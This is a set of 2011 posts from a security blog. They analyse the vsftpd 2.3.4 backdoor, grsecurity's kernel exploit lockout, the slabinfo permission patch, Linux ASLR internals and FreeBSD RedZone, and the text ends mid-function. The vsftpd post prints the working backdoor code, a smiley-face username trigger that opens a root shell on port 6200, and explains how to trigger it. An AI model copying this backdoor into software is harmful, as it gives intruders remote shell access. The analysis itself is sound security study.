xorl %eax, %eax

Archive for the ‘security’ Category

vsftpd 2.3.4 Backdoor

with 4 comments

This was a recent discovery by Chris Evans and you can read more details in his blog post available here. Furthermore, you can find information about this incident at The H Open as well as LWN.net websites.

So, the backdoor affects specifically 2.3.4 version of the popular FTP daemon and can be found in str.c file which contains code for handling the string manipulation routines.

int
str_contains_line(const struct mystr* p_str, const struct mystr* p_line_str)
{
  static struct mystr s_curr_line_str;
  unsigned int pos = 0;
  while (str_getline(p_str, &s_curr_line_str, &pos))
  {
    if (str_equal(&s_curr_line_str, p_line_str))
    {
      return 1;
    }
    else if((p_str->p_buf[i]==0x3a)
    && (p_str->p_buf[i+1]==0x29))
    {
       vsf_sysutil_extra();
    }
  }
  return 0;
}

Quite obvious. While parsing the received string values, if the string begins with “\x3A\x29” which in ASCII translates to ‘:)’ (a smiley face), it will invoke vsf_sysutil_extra().

This backdoor function was placed in sysdeputil.c file and looks like this:

int
vsf_sysutil_extra(void)
{
  int fd, rfd;
  struct sockaddr_in sa;
  if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
  exit(1); 
  memset(&sa, 0, sizeof(sa));
  sa.sin_family = AF_INET;
  sa.sin_port = htons(6200);
  sa.sin_addr.s_addr = INADDR_ANY;
  if((bind(fd,(struct sockaddr *)&sa,
  sizeof(struct sockaddr))) < 0) exit(1);
  if((listen(fd, 100)) == -1) exit(1);
  for(;;)
  { 
    rfd = accept(fd, 0, 0);
    close(0); close(1); close(2);
    dup2(rfd, 0); dup2(rfd, 1); dup2(rfd, 2);
    execl("/bin/sh","sh",(char *)0); 
  } 
}

It simply opens a new TCP socket listening on port 6200 that will spawn a shell when connected to this port.

So, by using the ‘:)’ as username the attackers were able to trigger this backdoor in vsftpd 2.3.4.

Written by xorl

July 5, 2011 at 03:54

Posted in hax, security

GRKERNSEC_KERN_LOCKOUT Active Kernel Exploit Response

leave a comment »

This is a brand new feature of “Address Space Protection” that grsecurity offers. Its configuration option is very clear and it is implemented by adding just two new routines in the existing patch.

config GRKERNSEC_KERN_LOCKOUT
	bool "Active kernel exploit response"
	depends on X86
	help
	  If you say Y here, when a PaX alert is triggered due to suspicious
	  activity in the kernel (from KERNEXEC/UDEREF/USERCOPY)
	  or an OOPs occurs due to bad memory accesses, instead of just
	  terminating the offending process (and potentially allowing
	  a subsequent exploit from the same user), we will take one of two
	  actions:
	   If the user was root, we will panic the system
	   If the user was non-root, we will log the attempt, terminate
	   all processes owned by the user, then prevent them from creating
	   any new processes until the system is restarted
	  This deters repeated kernel exploitation/bruteforcing attempts
	  and is useful for later forensics.

First of all, the ‘user_struct’ at include/linux/sched.h was updated to include two new members that will be used to keep track of the banned users. Here is the code snippet that shows the newly added members.

/*
 * Some day this will be a full-fledged user tracking system..
 */
struct user_struct {
   ...
        struct key *session_keyring;    /* UID's default session keyring */
#endif
 
#if defined(CONFIG_GRKERNSEC_KERN_LOCKOUT) || defined(CONFIG_GRKERNSEC_BRUTE)
	unsigned int banned;
	unsigned long ban_expires;
#endif
   ...
};

Next we can have a look at grsecurity/grsec_sig.c to see the first function which is responsible for handling the banned users.

int gr_process_user_ban(void)
{
#if defined(CONFIG_GRKERNSEC_KERN_LOCKOUT) || defined(CONFIG_GRKERNSEC_BRUTE)
	if (unlikely(current->cred->user->banned)) {
		struct user_struct *user = current->cred->user;
		if (user->ban_expires != ~0UL && time_after_eq(get_seconds(), user->ban_expires)) {
			user->banned = 0;
			user->ban_expires = 0;
			free_uid(user);
		} else
			return -EPERM;
	}
#endif
	return 0;
}

What it does is checking if the user is banned and if this is the case, wait for ‘user->ban_expires’ to reset its status. Of course, this does not apply to users with values of ‘~0UL’ in ‘ban_expires’ variable. Those users will be banned until the system is restarted.

The next routine also located in the same source code file is this one.

void gr_handle_kernel_exploit(void)
{
#ifdef CONFIG_GRKERNSEC_KERN_LOCKOUT
	const struct cred *cred;
	struct task_struct *tsk, *tsk2;
	struct user_struct *user;
	uid_t uid;

	if (in_irq() || in_serving_softirq() || in_nmi())
		panic("grsec: halting the system due to suspicious kernel crash caused in interrupt context");

	uid = current_uid();

	if (uid == 0)
		panic("grsec: halting the system due to suspicious kernel crash caused by root");
	else {
		/* kill all the processes of this user, hold a reference
		   to their creds struct, and prevent them from creating
		   another process until system reset
		*/
		printk(KERN_ALERT "grsec: banning user with uid %u until system restart for suspicious kernel crash\n", uid);
		/* we intentionally leak this ref */
		user = get_uid(current->cred->user);
		if (user) {
			user->banned = 1;
			user->ban_expires = ~0UL;
		}

		read_lock(&tasklist_lock);
		do_each_thread(tsk2, tsk) {
			cred = __task_cred(tsk);
			if (cred->uid == uid)
				gr_fake_force_sig(SIGKILL, tsk);
		} while_each_thread(tsk2, tsk);
		read_unlock(&tasklist_lock);
	}
#endif
}

So, if this is called in the context of an interrupt (IRQ, SoftIRQ or NMI) or the current user is root, it will immediately invoke panic() to halt the system and avoid any possible further exploitation of a kernel vulnerability. In any other case it will log the event and ban that user by updating the ‘user->banned’ and ‘user->ban_expires’ members of the ‘user_struct’ structure. The final ‘while_each_thread’ loop will use gr_fake_force_sig() which is shown below to terminate (by sending kill signal) every task owned by the user who triggered the event.

#ifdef CONFIG_GRKERNSEC
extern int specific_send_sig_info(int sig, struct siginfo *info, struct task_struct *t);

int gr_fake_force_sig(int sig, struct task_struct *t)
{
	unsigned long int flags;
	int ret, blocked, ignored;
	struct k_sigaction *action;

	spin_lock_irqsave(&t->sighand->siglock, flags);
	action = &t->sighand->action[sig-1];
	ignored = action->sa.sa_handler == SIG_IGN;
	blocked = sigismember(&t->blocked, sig);
	if (blocked || ignored) {
		action->sa.sa_handler = SIG_DFL;
		if (blocked) {
			sigdelset(&t->blocked, sig);
			recalc_sigpending_and_wake(t);
		}
	}
	if (action->sa.sa_handler == SIG_DFL)
		t->signal->flags &= ~SIGNAL_UNKILLABLE;
	ret = specific_send_sig_info(sig, SEND_SIG_PRIV, t);

	spin_unlock_irqrestore(&t->sighand->siglock, flags);

	return ret;
}
#endif

This routine will send the requested signal to the process.

So, now to the actual patching, the first patched code is the __kprobes oops_end() routine located at arch/x86/kernel/dumpstack.c file.

void __kprobes oops_end(unsigned long flags, struct pt_regs *regs, int signr)
{
   ...
 	if (panic_on_oops)
 		panic("Fatal exception");

	gr_handle_kernel_exploit();

	do_group_exit(signr);
}

This is triggered at the last step of a kernel OOPS. Consequently, it’s an ideal location to place this protection. Next we have the ‘execve’ routines that are invoked for spawning new processes. Specifically, the compat_do_execve() you see here from fs/compat.c file.

/*
 * compat_do_execve() is mostly a copy of do_execve(), with the exception
 * that it processes 32 bit argv and envp pointers.
 */
int compat_do_execve(char * filename,
        compat_uptr_t __user *argv,
        compat_uptr_t __user *envp,
        struct pt_regs * regs)
{
   ...
 	bprm->interp = filename;
 
	if (gr_process_user_ban()) {
		retval = -EPERM;
		goto out_file;
	}
   ...
out_ret:
        return retval;
}

Which is where it checks if the user is banned. Of course, similar check is also included in the do_execve() system call from fs/exec.c.

/*
 * sys_execve() executes a new program.
 */
int do_execve(const char * filename,
        const char __user *const __user *argv,
        const char __user *const __user *envp,
        struct pt_regs * regs)
{
   ...
 	bprm->interp = filename;
 
	if (gr_process_user_ban()) {
		retval = -EPERM;
		goto out_file;
	}
   ...
out_ret:
        return retval;
}

Finally, the pax_report_usercopy() is updated to handle the possible attacks using the new locking-out feature.

	
void pax_report_usercopy(const void *ptr, unsigned long len, bool to, const char *type)
{
	if (current->signal->curr_ip)
		printk(KERN_ERR "PAX: From %pI4: kernel memory %s attempt detected %s %p (%s) (%lu bytes)\n",
			&current->signal->curr_ip, to ? "leak" : "overwrite", to ? "from" : "to", ptr, type ? : "unknown", len);
	else
		printk(KERN_ERR "PAX: kernel memory %s attempt detected %s %p (%s) (%lu bytes)\n",
			to ? "leak" : "overwrite", to ? "from" : "to", ptr, type ? : "unknown", len);

	dump_stack();
	gr_handle_kernel_exploit();
	do_group_exit(SIGKILL);
}

Written by xorl

April 27, 2011 at 22:43

Posted in grsecurity, linux, security

Linux kernel /proc/slabinfo Protection

with 3 comments

Recently, Dan Rosenberg committed this patch to the Linux kernel. The patch affects SLAB and SLUB allocators by changing the permissions of the ‘/proc/slabinfo’ file in slab_proc_init() for SLAB.

static int __init slab_proc_init(void)
{
-	proc_create("slabinfo",S_IWUSR|S_IRUGO,NULL,&proc_slabinfo_operations);
+	proc_create("slabinfo", S_IWUSR|S_IRUSR, NULL,
+		    &proc_slabinfo_operations);
#ifdef CONFIG_DEBUG_SLAB_LEAK

As well as in the equivalent slab_proc_init() for SLUB.

static int __init slab_proc_init(void)
{
-	proc_create("slabinfo", S_IRUGO, NULL, &proc_slabinfo_operations);
+	proc_create("slabinfo", S_IRUSR, NULL, &proc_slabinfo_operations);
 	return 0;
}

The concept behind this is something quite simple which was previously implemented in grsecurity (check out GRKERNSEC_PROC_ADD) by spender. Almost anyone who has ever developed a kernel heap exploit for the Linux kernel knows that using ‘/proc/slabinfo’ you can easily track the status of the SLAB you are corrupting.
This patch limits the reliability of Linux kernel heap exploitation since unprivileged users can no longer read this PROCFS file.

Written by xorl

March 5, 2011 at 14:22

Posted in linux, security

Linux kernel ASLR Implementation

with 4 comments

Since June 2005 (specifically 2.6.12), Linux kernel has build-in ASLR (Address space Layout Randomization) support. In this post I’m trying to give a brief description of how this is implemented. However, I will be focusing more to the x86 architecture since this protection mechanism leads to some architecture dependent issues.

Random Number Generation
The PRNG used for ASLR of Linux kernel is the get_random_int() routine as we’ll see later in this post. This function is located at drivers/char/random.c file and it is shown below.

static struct keydata {
        __u32 count; /* already shifted to the final position */
        __u32 secret[12];
} ____cacheline_aligned ip_keydata[2];
  ...
/*
 * Get a random word for internal kernel use only. Similar to urandom but
 * with the goal of minimal entropy pool depletion. As a result, the random
 * value is not cryptographically secure but for several uses the cost of
 * depleting entropy is too high
 */
DEFINE_PER_CPU(__u32 [4], get_random_int_hash);
unsigned int get_random_int(void)
{
        struct keydata *keyptr;
        __u32 *hash = get_cpu_var(get_random_int_hash);
        int ret;

        keyptr = get_keyptr();
        hash[0] += current->pid + jiffies + get_cycles();

        ret = half_md4_transform(hash, keyptr->secret);
        put_cpu_var(get_random_int_hash);

        return ret;
}

After defining some per-processor values, it uses the get_cpu_var()/put_cpu_var() C macros to get and store the random hash to the processor specific array. This is leaving us with get_keyptr() which initializes the ‘keydata’ structure and the actual random number generation.
The ‘keydata’ initialization is performed using this C function:

static struct keydata {
        __u32 count; /* already shifted to the final position */
        __u32 secret[12];
} ____cacheline_aligned ip_keydata[2];

static unsigned int ip_cnt;
  ...
static inline struct keydata *get_keyptr(void)
{
        struct keydata *keyptr = &ip_keydata[ip_cnt & 1];

        smp_rmb();

        return keyptr;
}

The smp_rmb() macro is defined in arch/x86/include/asm/system.h header file for the x86 architecture and it stands for Read Memory Barrier.

/*
 * Force strict CPU ordering.
 * And yes, this is required on UP too when we're talking
 * to devices.
 */
#ifdef CONFIG_X86_32
/*
 * Some non-Intel clones support out of order store. wmb() ceases to be a
 * nop for these.
 */
#define mb() alternative("lock; addl $0,0(%%esp)", "mfence", X86_FEATURE_XMM2)
#define rmb() alternative("lock; addl $0,0(%%esp)", "lfence", X86_FEATURE_XMM2)
#define wmb() alternative("lock; addl $0,0(%%esp)", "sfence", X86_FEATURE_XMM)
#else
#define mb()    asm volatile("mfence":::"memory")
#define rmb()   asm volatile("lfence":::"memory")
#define wmb()   asm volatile("sfence" ::: "memory")
#endif
  ...
#ifdef CONFIG_SMP
#define smp_mb()        mb()
#ifdef CONFIG_X86_PPRO_FENCE
# define smp_rmb()      rmb()
#else
# define smp_rmb()      barrier()
#endif

This is used to flush any pending read that subsequent reads depend on. As we can read in the same header file:

 * No data-dependent reads from memory-like regions are ever reordered
 * over this barrier.  All reads preceding this primitive are guaranteed
 * to access memory (but not necessarily other CPUs' caches) before any
 * reads following this primitive that depend on the data return by
 * any of the preceding reads.  This primitive is much lighter weight than
 * rmb() on most CPUs, and is never heavier weight than is
 * rmb().
 *
 * These ordering constraints are respected by both the local CPU
 * and the compiler.
 *
 * Ordering is not guaranteed by anything other than these primitives,
 * not even by data dependencies.  See the documentation for
 * memory_barrier() for examples and URLs to more information.

This ensures that ‘keyptr’ initialization doesn’t get reordered and back to get_random_int() we can now have a look at the exact random number generation code. According to:

hash[0] += current->pid + jiffies + get_cycles()

We have four different variables being involved. Those are:
– The address of the first element of the ‘hash[0]’ array
– The currently executing process ID for the processor that handles this
– The system’s jiffies value
– CPU cycles number
The last variable is derived from get_cycles() inline function that is defined at arch/x86/include/asm/tsc.h for the x86 architecture.

static inline cycles_t get_cycles(void)
{
        unsigned long long ret = 0;

#ifndef CONFIG_X86_TSC
        if (!cpu_has_tsc)
                return 0;
#endif
        rdtscll(ret);

        return ret;
}

This means that if the processor supports rdtsc instruction it will jump to arch/x86/include/asm/msr.h header file to execute the following C macro:

static __always_inline unsigned long long __native_read_tsc(void)
{
        DECLARE_ARGS(val, low, high);

        asm volatile("rdtsc" : EAX_EDX_RET(val, low, high));

        return EAX_EDX_VAL(val, low, high);
}
  ...
#define rdtscll(val)                                            \
        ((val) = __native_read_tsc())

Which basically, simply executes the rdtsc instruction.
Back to get_random_int() we can see that even though there are a lot of difficult to guess variables being used to generate that pseudo-random integer, it also calls half_md4_transform() which is defined at lib/halfmd4.c and it implements a basic MD4 algorithm.

/* F, G and H are basic MD4 functions: selection, majority, parity */
#define F(x, y, z) ((z) ^ ((x) & ((y) ^ (z))))
#define G(x, y, z) (((x) & (y)) + (((x) ^ (y)) & (z)))
#define H(x, y, z) ((x) ^ (y) ^ (z))
  ...
#define ROUND(f, a, b, c, d, x, s)      \
        (a += f(b, c, d) + x, a = (a << s) | (a >> (32 - s)))
#define K1 0
#define K2 013240474631UL
#define K3 015666365641UL
  ...
__u32 half_md4_transform(__u32 buf[4], __u32 const in[8])
{
        __u32 a = buf[0], b = buf[1], c = buf[2], d = buf[3];

        /* Round 1 */
        ROUND(F, a, b, c, d, in[0] + K1,  3);
        ROUND(F, d, a, b, c, in[1] + K1,  7);
        ROUND(F, c, d, a, b, in[2] + K1, 11);
        ROUND(F, b, c, d, a, in[3] + K1, 19);
        ROUND(F, a, b, c, d, in[4] + K1,  3);
        ROUND(F, d, a, b, c, in[5] + K1,  7);
        ROUND(F, c, d, a, b, in[6] + K1, 11);
        ROUND(F, b, c, d, a, in[7] + K1, 19);

        /* Round 2 */
        ROUND(G, a, b, c, d, in[1] + K2,  3);
        ROUND(G, d, a, b, c, in[3] + K2,  5);
        ROUND(G, c, d, a, b, in[5] + K2,  9);
        ROUND(G, b, c, d, a, in[7] + K2, 13);
        ROUND(G, a, b, c, d, in[0] + K2,  3);
        ROUND(G, d, a, b, c, in[2] + K2,  5);
        ROUND(G, c, d, a, b, in[4] + K2,  9);
        ROUND(G, b, c, d, a, in[6] + K2, 13);

        /* Round 3 */
        ROUND(H, a, b, c, d, in[3] + K3,  3);
        ROUND(H, d, a, b, c, in[7] + K3,  9);
        ROUND(H, c, d, a, b, in[2] + K3, 11);
        ROUND(H, b, c, d, a, in[6] + K3, 15);
        ROUND(H, a, b, c, d, in[1] + K3,  3);
        ROUND(H, d, a, b, c, in[5] + K3,  9);
        ROUND(H, c, d, a, b, in[0] + K3, 11);
        ROUND(H, b, c, d, a, in[4] + K3, 15);

        buf[0] += a;
        buf[1] += b;
        buf[2] += c;
        buf[3] += d;

        return buf[1]; /* "most hashed" word */
}

This makes things even more complex for anyone attempting to guess the resulted integer. Now that we have a basic understanding of the pseudo-random number generation routine utilized by the Linux ASLR implementation we can move on to the actual code that uses this.

brk(2) Randomization
At the fs/binfmt_elf.c is where the Linux kernel’s ELF loader is located. The routine that loads the actual executable binary file is the load_elf_binary() which among others includes the following code.

static int load_elf_binary(struct linux_binprm *bprm, struct pt_regs *regs)
{
        struct file *interpreter = NULL; /* to shut gcc up */
        unsigned long load_addr = 0, load_bias = 0;
  ...
#ifdef arch_randomize_brk
        if ((current->flags & PF_RANDOMIZE) && (randomize_va_space > 1))
                current->mm->brk = current->mm->start_brk =
                        arch_randomize_brk(current->mm);
#endif
  ...
out_free_ph:
        kfree(elf_phdata);
        goto out;
}

This means that if the ‘arch_randomize_brk’ is defined it will check if the current process should have a randomized virtual address space using ‘PF_RANDOMIZE’ flag as well as if the ‘randomize_va_space’ is greater than 1. If this is the case, it will update its current starting data segment address using the return address of arch_randomize_brk().
The latter routine can be found at arch/x86/kernel/process.c for the x86 family.

unsigned long arch_randomize_brk(struct mm_struct *mm)
{
        unsigned long range_end = mm->brk + 0x02000000;
        return randomize_range(mm->brk, range_end, 0) ? : mm->brk;
}

It calculates the end of the data segment by adding 0x02000000 to the starting address and then calling randomize_range() to randomize the given address space. This randomization routine is also placed in drivers/char/random.c and you can see it here:

/*
 * randomize_range() returns a start address such that
 *
 *    [...... <range> .....]
 *  start                  end
 *
 * a <range> with size "len" starting at the return value is inside in the
 * area defined by [start, end], but is otherwise randomized.
 */
unsigned long
randomize_range(unsigned long start, unsigned long end, unsigned long len)
{
        unsigned long range = end - len - start;

        if (end <= start + len)
                return 0;
        return PAGE_ALIGN(get_random_int() % range + start);
}

If the range is correct, it will invoke get_random_int() using the starting address and of course, the resulted value is aligned to the next page boundary as this is defined by the ‘PAGE_SIZE’ constant.

SYSCTL Interface
In the previous section we encountered a variable named ‘randomize_va_space’. As almost any Linux administrator knows, the Linux ASLR can be tuned using the ‘/proc/sys/vm/randomize_va_space’ or ‘kernel.randomize_va_space’ SYSCTL variable. In both cases the result is passing an integer value to the kernel as we can read at kernel/sysctl.c which is where this is defined.

static struct ctl_table kern_table[] = {
  ...
#if defined(CONFIG_MMU)
        {
                .procname       = "randomize_va_space",
                .data           = &randomize_va_space,
                .maxlen         = sizeof(int),
                .mode           = 0644,
                .proc_handler   = proc_dointvec,
        },
#endif
  ...
/*
 * NOTE: do not add new entries to this table unless you have read
 * Documentation/sysctl/ctl_unnumbered.txt
 */
        { }
};

The actual variable ‘randomize_va_space’ is placed in mm/memory.c as shown below.

/*
 * Randomize the address space (stacks, mmaps, brk, etc.).
 *
 * ( When CONFIG_COMPAT_BRK=y we exclude brk from randomization,
 *   as ancient (libc5 based) binaries can segfault. )
 */
int randomize_va_space __read_mostly =
#ifdef CONFIG_COMPAT_BRK
                                        1;
#else
                                        2;
#endif

Here, the ‘__read_mostly’ modifier is an architecture specific attribute which in case of x86 processors is defined in arch/x86/include/asm/cache.h header file.

#define __read_mostly __attribute__((__section__(".data..read_mostly")))

This forces the variable to be placed in a section called .data.read_mostly that is designed for static variables which are initialized once and very rarely changed.
From the kernel developers’ comment we can also see that if the compatibility support option for brk(2) system call is enabled, it will not randomize it since it could break old versions of C library. Additionally, this variable is defined in SYSCTL’s kernel table as we can find at kernel/sysctl_binary.c file.

static const struct bin_table bin_kern_table[] = {
  ...
        { CTL_INT,      KERN_RANDOMIZE,                 "randomize_va_space" },
  ...
        {}
};

Which uses the ‘KERN_RANDOMIZE’ value as this was defined in include/linux/sysctl.h header file.

/* CTL_KERN names: */
enum
{
  ...
        KERN_RANDOMIZE=68, /* int: randomize virtual address space */
  ...
};

Now that we have a basic understanding of what is going on in the kernel when manipulating that variable through SYSCTL interface, we can move to the more interesting parts…

Stack Randomization
The actual stack randomization takes place in fs/exec.c and more specifically in the setup_arg_pages() routine which is responsible for the final stage of stack initialization before executing a binary. Here is a code snippet that demonstrates how the stack randomization is implemented…

/*
 * Finalizes the stack vm_area_struct. The flags and permissions are updated,
 * the stack is optionally relocated, and some extra space is added.
 */
int setup_arg_pages(struct linux_binprm *bprm,
                    unsigned long stack_top,
                    int executable_stack)
{
  ...
#ifdef CONFIG_STACK_GROWSUP
  ...
#else
        stack_top = arch_align_stack(stack_top);
        stack_top = PAGE_ALIGN(stack_top);
  ...
out_unlock:
        up_write(&mm->mmap_sem);
        return ret;
}

If the stack segment does not grow upwards, it will use arch_align_stack() passing the stack top address which was an argument of setup_arg_pages() routine. Then it will align the returned value in a page boundary and continue with the stack segment setup. Assuming that we’re dealing with an x86 architecture, the initial function call will lead to arch/x86/kernel/process.c file where we can find the following code.

unsigned long arch_align_stack(unsigned long sp)
{
        if (!(current->personality & ADDR_NO_RANDOMIZE) && randomize_va_space)
                sp -= get_random_int() % 8192;
        return sp & ~0xf;
}

The check is fairly simple. If the currently executed task doesn’t have ‘ADDR_NO_RANDOMIZE’ personality set which is used to disable the randomization and the ‘randomize_va_space’ has a non-zero value, it will invoke get_random_int() to perform the stack randomization. Before moving on, for completeness here is the include/linux/personality.h header file’s definition of the above personality constant value.

/*
 * Flags for bug emulation.
 *
 * These occupy the top three bytes.
 */
enum {
        ADDR_NO_RANDOMIZE =     0x0040000,      /* disable randomization of VA space */
  ...
};

Back to arch_align_stack(), after decrementing the stack pointer with the random number in case of an ASLR supported task, it’ll align it by masking it with 0xfffffff0 on 32-bit processors. However, a quick look in fs/binfmt_elf.c shows that this is not that simple since this is how it’s implemented in the ELF loader’s code…

static int load_elf_binary(struct linux_binprm *bprm, struct pt_regs *regs)
{
        struct file *interpreter = NULL; /* to shut gcc up */
  ...
        /* Do this so that we can load the interpreter, if need be.  We will
           change some of these later */
        current->mm->free_area_cache = current->mm->mmap_base;
        current->mm->cached_hole_size = 0;
        retval = setup_arg_pages(bprm, randomize_stack_top(STACK_TOP),
                                 executable_stack);
  ...
        goto out;
}

We can see here that it passes a randomized stack top pointer using the randomize_stack_top() routine from the same source code file.

#ifndef STACK_RND_MASK
#define STACK_RND_MASK (0x7ff >> (PAGE_SHIFT - 12))     /* 8MB of VA */
#endif

static unsigned long randomize_stack_top(unsigned long stack_top)
{
        unsigned int random_variable = 0;

        if ((current->flags & PF_RANDOMIZE) &&
                !(current->personality & ADDR_NO_RANDOMIZE)) {
                random_variable = get_random_int() & STACK_RND_MASK;
                random_variable <<= PAGE_SHIFT;
        }
#ifdef CONFIG_STACK_GROWSUP
        return PAGE_ALIGN(stack_top) + random_variable;
#else
        return PAGE_ALIGN(stack_top) - random_variable;
#endif
}

Once again, the current process won’t be randomized if it doesn’t have ‘PF_RANDOMIZE’ flag and it has ‘ADDR_NO_RANDOMIZE’ personality set. Otherwise, it will use get_random_int() as well as the ‘STACK_RND_MASK’ to mask the returned integer. Although you see the definition of the latter constant in the given code snippet, it is originally defined in the architecture specific arch/x86/include/asm/elf.h header file.

#ifdef CONFIG_X86_32

#define STACK_RND_MASK (0x7ff)

This is pretty much the stack ASLR implementation of Linux.

mmap(2) Randomization
Before we dive into the mmap(2) randomization itself, what happens with mmap(2) allocations colliding with the randomized stack space?
So, to avoid such collisions with the stack randomized virtual address space, Linux kernel developers implemented the following routine in arch/x86/mm/mmap.c file.

static unsigned int stack_maxrandom_size(void)
{
        unsigned int max = 0;
        if ((current->flags & PF_RANDOMIZE) &&
                !(current->personality & ADDR_NO_RANDOMIZE)) {
                max = ((-1U) & STACK_RND_MASK) << PAGE_SHIFT;
        }

        return max;
}


/*
 * Top of mmap area (just below the process stack).
 *
 * Leave an at least ~128 MB hole with possible stack randomization.
 */
#define MIN_GAP (128*1024*1024UL + stack_maxrandom_size())
#define MAX_GAP (TASK_SIZE/6*5)

After performing the usual checks on the currently executing task, it calculates the maximum randomized address based on the ‘STACK_RND_MASK’ value. Later on, inside mmap_base() we can see how the above C macros are used to ensure it doesn’t collide with the randomized space.

static unsigned long mmap_base(void)
{
        unsigned long gap = rlimit(RLIMIT_STACK);

        if (gap < MIN_GAP)
                gap = MIN_GAP;
        else if (gap > MAX_GAP)
                gap = MAX_GAP;

        return PAGE_ALIGN(TASK_SIZE - gap - mmap_rnd());
}

Here is also our first contact with the mmap(2) randomization routine which is, of course, through mmap_rnd(). This one is placed in arch/x86/mm/mmap.c and its code is this:

static unsigned long mmap_rnd(void)
{
        unsigned long rnd = 0;

       /*
        *  8 bits of randomness in 32bit mmaps, 20 address space bits
        * 28 bits of randomness in 64bit mmaps, 40 address space bits
        */
        if (current->flags & PF_RANDOMIZE) {
                if (mmap_is_ia32())
                        rnd = (long)get_random_int() % (1<<8);
                else
                        rnd = (long)(get_random_int() % (1<<28));
        }
        return rnd << PAGE_SHIFT;
}

Which is pretty self-explanatory code.

So, I believe this post should give readers a grasp on how Linux ASLR is implemented. I used 2.6.36 version of the Linux kernel so this might be useless for future releases but for now it is up-to-date. Any comments, corrections or suggestions are always welcome.

Written by xorl

January 16, 2011 at 21:09

Posted in linux, security

FreeBSD Red Zone – Kernel Buffer Corruption Detector

leave a comment »

Since FreeBSD 7.0 this feature named “RedZone” is implemented inside the operating system’s kernel to detect buffer underflow and overflow bugs in kernel at run-time. It was developed and maintained by Pawel Jakub Dawidek and it’s placed in vm/redzone.c and vm/redzone.h in the FreeBSD’s kernel code.

The SYSCTL Interface
As you’ve probably read from the man page link I gave above, this can be tuned through ‘vm.redzone.panic’ and ‘vm.redzone.extra_mem’ SYSCTL variables. Inside vm/redzone.c we can find this:

SYSCTL_NODE(_vm, OID_AUTO, redzone, CTLFLAG_RW, NULL, "RedZone data");
static u_long redzone_extra_mem = 0;
SYSCTL_ULONG(_vm_redzone, OID_AUTO, extra_mem, CTLFLAG_RD, &redzone_extra_mem,
    0, "Extra memory allocated by redzone");     
static int redzone_panic = 0;
TUNABLE_INT("vm.redzone.panic", &redzone_panic);
SYSCTL_INT(_vm_redzone, OID_AUTO, panic, CTLFLAG_RW, &redzone_panic, 0,
    "Panic when buffer corruption is detected");     

Which shows what variables are changed from the kernel’s perspective using those SYSCTL variables. This isn’t really important but for completeness I decided to add it.

Setting Up a Red Zone
The code responsible for initializing a red-zone is inside redzone_setup() function which is shown below.

#define REDZONE_CHSIZE  (16)
#define REDZONE_CFSIZE  (16)
 ...
/*
 * Set redzones and remember allocation backtrace.
 */
void *
redzone_setup(caddr_t raddr, u_long nsize)
{
        struct stack st;
        caddr_t haddr, faddr;

        atomic_add_long(&redzone_extra_mem, redzone_size_ntor(nsize) - nsize);

        haddr = raddr + redzone_roundup(nsize) - REDZONE_HSIZE;
        faddr = haddr + REDZONE_HSIZE + nsize;

        /* Redzone header. */
        stack_save(&st);
        bcopy(&st, haddr, sizeof(st));
        haddr += sizeof(st);
        bcopy(&nsize, haddr, sizeof(nsize));
        haddr += sizeof(nsize);
        memset(haddr, 0x42, REDZONE_CHSIZE);
        haddr += REDZONE_CHSIZE;

        /* Redzone footer. */
        memset(faddr, 0x42, REDZONE_CFSIZE);
 
        return (haddr);
}

The algorithm here is fairly simple, after updating ‘redzone_extra_mem’ with the new size using atomic_add_long(), it initializes ‘haddr’ (header address) and ‘faddr’ (footer address) to point to the beginning and the end of the new space respectively. The current stack is placed in the header address followed by allocation size represented by ‘nsize’ unsigned long integer.

#define STACK_MAX       18      /* Don't change, stack_ktr relies on this. */

struct stack {
        int             depth;
        vm_offset_t     pcs[STACK_MAX];
};

The rest of the header and footer space are filled with ‘0x42’ (which is the equivalent hexadecimal value of ASCII character ‘B’). So, with this knowledge we can now understand that a red-zone in FreeBSD looks like this:

     +--------------------+ <--- Header
     |                    | 
     |   Current Stack    | 
     |                    |
     +--------------------+ <--- Header + sizeof(stack)
     |                    |
     |   Allocation size  |
     |                    |
     +--------------------+ <--- Header + nsize
     |     BBBBBBBBBB     |
     |       BBBBBB       |
     |                    |
     +--------------------+ <--- Footer
     |     BBBBBBBBBB     |
     |       BBBBBB       |
     |                    |
     +--------------------+ <--- Footer + REDZONE_CFSIZE

Red-Zone Checks
To check if a red-zone was corrupted which almost certainly means that an overflow occurred in a buffer close to it, redzone_check() function is used. Its argument is the address of the allocated space after the redzone and that’s why it will initially subtract the redzone’s header size to read its data and store it in some local variables as you can see in this code snippet:

/*
 * Verify redzones.
 * This function is called on free() and realloc().
 */
void
redzone_check(caddr_t naddr)
{
        struct stack ast, fst;
        caddr_t haddr, faddr;
        u_int ncorruptions;
        u_long nsize;
        int i;
 
        haddr = naddr - REDZONE_HSIZE;
        bcopy(haddr, &ast, sizeof(ast));
        haddr += sizeof(ast);
        bcopy(haddr, &nsize, sizeof(nsize));
        haddr += sizeof(nsize);
 
        atomic_subtract_long(&redzone_extra_mem,
            redzone_size_ntor(nsize) - nsize);

Then, we can find a simple ‘for’ loop that will iterate for the header part of the redzone to ensure that no 0x42 entries where altered.

        /* Look for buffer underflow. */
        ncorruptions = 0;
        for (i = 0; i < REDZONE_CHSIZE; i++, haddr++) {
                if (*(u_char *)haddr != 0x42)
                        ncorruptions++;
         }

However, if one or more altered/corrupted Bytes where discovered it will result in executing the next part.

        if (ncorruptions > 0) {
                printf("REDZONE: Buffer underflow detected. %u byte%s "
                    "corrupted before %p (%lu bytes allocated).\n",
                    ncorruptions, ncorruptions == 1 ? "" : "s", naddr, nsize);
                printf("Allocation backtrace:\n");
                stack_print_ddb(&ast);
                printf("Free backtrace:\n");
                stack_save(&fst);
                stack_print_ddb(&fst);
                if (redzone_panic)
                        panic("Stopping here.");
        }

Which might panic the system (depends on the ‘redzone_panic’ constant which by default is set to 0 but it can be tuned using the SYSCTL interface) but before doing this, it will give a complete stack-trace that could help in detecting the bug. The next part of redzone_check() does the exact same task for the footer.

        faddr = naddr + nsize;
        /* Look for buffer overflow. */
         ncorruptions = 0;
        for (i = 0; i < REDZONE_CFSIZE; i++, faddr++) {
                if (*(u_char *)faddr != 0x42)
                        ncorruptions++;
        }

Once again, in case of one or more corrupted Bytes the result will be a complete stack-trace and depending on the ‘redzone_panic’ value, a system panic.

        if (ncorruptions > 0) {
                printf("REDZONE: Buffer overflow detected. %u byte%s corrupted "
                    "after %p (%lu bytes allocated).\n", ncorruptions,
                    ncorruptions == 1 ? "" : "s", naddr + nsize, nsize);
                printf("Allocation backtrace:\n");
                stack_print_ddb(&ast);
                printf("Free backtrace:\n");
                stack_save(&fst);
